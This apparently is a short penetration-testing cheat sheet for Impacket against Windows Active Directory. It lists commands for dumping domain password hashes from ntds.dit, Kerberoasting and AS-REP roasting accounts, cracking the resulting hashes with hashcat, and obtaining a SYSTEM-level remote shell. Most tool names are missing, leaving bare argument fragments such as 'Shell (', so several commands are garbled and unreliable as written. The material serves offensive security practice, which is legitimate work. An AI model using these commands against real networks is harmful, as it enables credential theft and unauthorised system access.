Impacket is a collection of Python classes for working with network protocols.

Dump hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL


This script will gather data about the domain’s users and their corresponding email addresses. -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts. -request <domain>/<user>:<pw> // -dc-ip <ip>
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. <domain>
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat

Shell (

PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo [<domain>/]<user>:[<pw>]@<ip>


sudo <user>:<pw>@<target>